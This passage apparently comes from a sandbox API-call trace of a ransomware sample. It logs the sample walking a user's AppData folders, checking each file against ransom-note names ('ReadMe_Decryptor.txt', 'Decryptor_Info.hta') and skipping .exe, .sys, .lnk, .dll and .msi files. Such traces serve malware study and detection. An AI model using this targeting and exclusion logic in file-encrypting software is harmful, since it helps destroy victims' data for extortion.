(in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b50050, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50b50050, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x50b50050, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x337, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@msn[1].txt", cAlternateFileName="5PBFF9~1.TXT")) returned 1 [0084.194] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2=".") returned 1 [0084.194] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="..") returned 1 [0084.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@msn[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.194] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@msn[1].txt") returned=".txt" [0084.194] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.194] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.194] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.194] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.195] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.195] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.195] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.195] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77e9c0 [0084.195] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.195] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5348e0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5348e0b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5348e0b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", cAlternateFileName="5P5NRG~4.TXT")) returned 1 [0084.195] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2=".") returned 1 [0084.195] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="..") returned 1 [0084.195] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.195] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.195] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt") returned=".txt" [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.195] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.195] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x780ab0 [0084.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.196] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x780bb8 [0084.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780ab0 | out: hHeap=0x6d0000) returned 1 [0084.196] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", cAlternateFileName="5P4910~1.TXT")) returned 1 [0084.196] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2=".") returned 1 [0084.196] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="..") returned 1 [0084.197] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.197] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.197] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt") returned=".txt" [0084.197] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.197] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.197] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.197] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.197] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x780ab0 [0084.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x780cc0 [0084.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x780ab0 | out: hHeap=0x6d0000) returned 1 [0084.197] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf99e810, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf99e810, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf99e810, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x68, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@skadtec[1].txt", cAlternateFileName="5P37A2~1.TXT")) returned 1 [0084.197] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2=".") returned 1 [0084.197] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="..") returned 1 [0084.197] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.198] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.198] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@skadtec[1].txt") returned=".txt" [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77eaa8 [0084.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.198] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf54e030, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf54e030, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf54e030, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@track.adform[2].txt", cAlternateFileName="5PD4D3~1.TXT")) returned 1 [0084.198] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2=".") returned 1 [0084.198] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="..") returned 1 [0084.198] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.198] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.198] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@track.adform[2].txt") returned=".txt" [0084.198] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x780ab0 [0084.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.199] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x555a9a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x555a9a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x555a9a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.bing[2].txt", cAlternateFileName="5PA943~1.TXT")) returned 1 [0084.199] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2=".") returned 1 [0084.199] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="..") returned 1 [0084.199] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.199] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.199] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@www.bing[2].txt") returned=".txt" [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.199] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x780dc8 [0084.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.200] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54d8c7b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54d8c7b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54d8c7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", cAlternateFileName="5PC3D9~1.TXT")) returned 1 [0084.200] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2=".") returned 1 [0084.200] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="..") returned 1 [0084.200] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.200] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.200] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt") returned=".txt" [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.200] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x780ec0 [0084.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.201] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4523d1d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x526fc010, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x526fc010, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.msn[2].txt", cAlternateFileName="5PD551~1.TXT")) returned 1 [0084.201] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2=".") returned 1 [0084.201] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="..") returned 1 [0084.201] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.201] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.201] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@www.msn[2].txt") returned=".txt" [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.201] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77eb90 [0084.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.202] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x432daef0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.202] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.202] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.202] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.202] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.202] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.202] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.202] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.202] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.202] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.202] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.202] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x432daef0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.203] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0084.204] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x432daef0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.205] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.205] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0084.205] lstrcmpW (lpString1="IECompatCache", lpString2=".") returned 1 [0084.205] lstrcmpW (lpString1="IECompatCache", lpString2="..") returned 1 [0084.205] lstrlenW (lpString="IECompatCache") returned 13 [0084.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IECompatCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache" [0084.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0084.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0084.205] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.206] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.206] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0084.206] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0084.206] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0084.207] lstrlenW (lpString="Low") returned 3 [0084.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low" [0084.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0084.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0084.207] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0084.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.207] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.207] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.208] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0084.208] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.208] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.208] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0084.208] lstrcmpW (lpString1="IETldCache", lpString2=".") returned 1 [0084.208] lstrcmpW (lpString1="IETldCache", lpString2="..") returned 1 [0084.208] lstrlenW (lpString="IETldCache") returned 10 [0084.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IETldCache" | out: 